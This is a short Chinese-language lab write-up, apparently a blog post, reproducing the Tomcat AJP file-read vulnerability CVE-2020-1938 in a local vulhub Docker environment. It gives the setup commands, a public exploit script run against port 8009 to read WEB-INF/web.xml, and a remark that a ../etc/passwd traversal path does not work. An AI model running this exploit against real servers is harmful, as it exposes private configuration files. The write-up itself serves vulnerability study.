Tomcat9 AJP 任意文件读取和文件包含漏洞(CVE-2020-1938)
文章目录
- Tomcat9 AJP 任意文件读取和文件包含漏洞(CVE-2020-1938)
- 1 在线漏洞解读:
- 2 环境搭建
- 2.1 修改端口8089
- 2.2 环境启动:
- 3 漏洞复现
1 在线漏洞解读:
https://vulhub.org/#/environments/tomcat/CVE-2020-1938/
2 环境搭建
cd /home/kali/vulhub/tomcat/CVE-2020-1938
2.1 修改端口8089
2.2 环境启动:
sudo docker-compose up -d
sudo docker ps -a
已启动:访问端口8089
3 漏洞复现
访问http://192.168.225.166:8089/
看到Tomcat示例页面,其中还有一个AJP端口8009正在监听
需要使用到工具访问AJP协议
https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
┌──(kali💋kali)-[~/tools/apache-tomcat/CNVD-2020-10487-Tomcat-Ajp-lfi]
└─$ python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.225.166 -p 8009 -f WEB-INF/web.xml
成功查看到文件
此漏洞有局限性只能读取tomcat/webapps/ROOT/目录下的文件,不存在目录穿越问题…/…/…/…/…/etc/passwd